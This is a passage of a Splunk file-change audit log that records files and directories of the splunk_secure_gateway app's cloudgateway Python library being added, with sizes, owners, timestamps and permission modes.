isdir=0, size=4078824, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.134, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/external_process.py", isdir=0, size=2196, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.130, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/errors.py", isdir=0, size=519, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.124, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:19.119, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client/__init__.py", isdir=0, size=218, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.015, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/clients/proxy_connect_agent.py", isdir=0, size=7752, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/clients/async_spacebridge_client.py", isdir=0, size=1435, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.007, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/clients/async_client.py", isdir=0, size=4911, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.004, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/clients/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:19.000, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/websocket/cloudgateway_message_handler.py", isdir=0, size=5853, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.996, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/websocket/cloudgateway_init.py", isdir=0, size=6526, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.991, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/websocket/cloudgateway_client_protocol.py", isdir=0, size=5466, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.987, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/websocket/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.983, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/websocket", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.979, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/mdm.py", isdir=0, size=8537, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.975, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/clients", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.971, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/auth_header.py", isdir=0, size=519, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.968, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/__pycache__/send.cpython-37.pyc", isdir=0, size=3548, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.860, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/__pycache__/parse.cpython-37.pyc", isdir=0, size=1785, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.853, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/__pycache__/__init__.cpython-37.pyc", isdir=0, size=175, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.848, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/util.py", isdir=0, size=715, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.843, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/send.py", isdir=0, size=4612, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.836, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/parse.py", isdir=0, size=1710, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.831, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.827, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.722, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/websocket", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.718, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/util", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.714, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/twisted", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.708, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/sodium_client", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.703, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/registration", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.700, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/messages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.696, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/exceptions", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.691, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/encryption", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.687, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/asyncio", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.683, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.679, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/asyncio/__pycache__/mdm_handler.cpython-37.pyc", isdir=0, size=5328, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.568, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/asyncio/__pycache__/__init__.cpython-37.pyc", isdir=0, size=166, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.564, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/asyncio/mdm_handler.py", isdir=0, size=8193, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.559, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/asyncio/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.555, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/asyncio/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/clients/__pycache__/async_server_info_client.cpython-37.pyc", isdir=0, size=3055, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.547, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/clients/__pycache__/__init__.cpython-37.pyc", isdir=0, size=181, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.542, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/clients/async_server_info_client.py", isdir=0, size=2743, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.537, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/clients/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.534, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/clients/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.428, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/cluster/__pycache__/cluster_monitor.cpython-37.pyc", isdir=0, size=1891, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.424, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/cluster/__pycache__/__init__.cpython-37.pyc", isdir=0, size=181, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/cluster/cluster_monitor.py", isdir=0, size=2004, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.416, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/cluster/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.411, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/cluster/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.406, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/__pycache__/auth.cpython-37.pyc", isdir=0, size=2966, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.403, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/__pycache__/__init__.cpython-37.pyc", isdir=0, size=173, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.397, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/cluster", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.393, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/clients", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.389, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/auth.py", isdir=0, size=2399, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.383, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.379, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.275, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/clients/__pycache__/splunk_client.cpython-37.pyc", isdir=0, size=2988, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.270, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/clients/__pycache__/__init__.cpython-37.pyc", isdir=0, size=173, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.264, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/clients/splunk_client.py", isdir=0, size=3219, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.260, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/clients/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.256, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/clients/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.250, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/__pycache__/encryption.cpython-37.pyc", isdir=0, size=3649, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.244, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/__pycache__/auth.cpython-37.pyc", isdir=0, size=5251, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.239, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/__pycache__/__init__.cpython-37.pyc", isdir=0, size=165, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:18.233, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/clients/async_server_info_client.py", isdir=0, size=2570, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.227, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/clients/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.121, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/cluster/cluster_monitor.py", isdir=0, size=2037, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.117, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/cluster/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.114, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/cluster", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.111, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/clients", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.108, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/auth.py", isdir=0, size=3818, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.105, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.101, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/twisted", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.098, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/encryption.py", isdir=0, size=3125, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.095, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/clients", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.090, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/auth.py", isdir=0, size=4141, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:18.085, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/asyncio", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:18.082, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:18.077, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.974, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/websocket.cpython-37.pyc", isdir=0, size=9683, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.968, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/py23.cpython-37.pyc", isdir=0, size=940, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.963, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/mdm.cpython-37.pyc", isdir=0, size=5798, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.959, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/key_bundle.cpython-37.pyc", isdir=0, size=2999, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.955, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/encryption_context.cpython-37.pyc", isdir=0, size=4993, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.951, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/device.cpython-37.pyc", isdir=0, size=3575, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.947, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/auth.cpython-37.pyc", isdir=0, size=2839, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.943, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/__pycache__/__init__.cpython-37.pyc", isdir=0, size=219, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:17.939, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/twisted/mdm_handler.py", isdir=0, size=9216, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.934, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/twisted/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.829, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/websocket.py", isdir=0, size=10376, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/twisted", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.821, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/splunk", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.817, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/registration.py", isdir=0, size=10020, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.813, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/py23.py", isdir=0, size=775, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.807, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/private", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:17.801, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/mdm.py", isdir=0, size=4821, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.795, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/key_bundle.py", isdir=0, size=1753, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.790, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/encryption_context.py", isdir=0, size=4367, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.786, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/device.py", isdir=0, size=4730, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:17.782, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/cloudgateway/auth.py", isdir=0, size=1722, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] 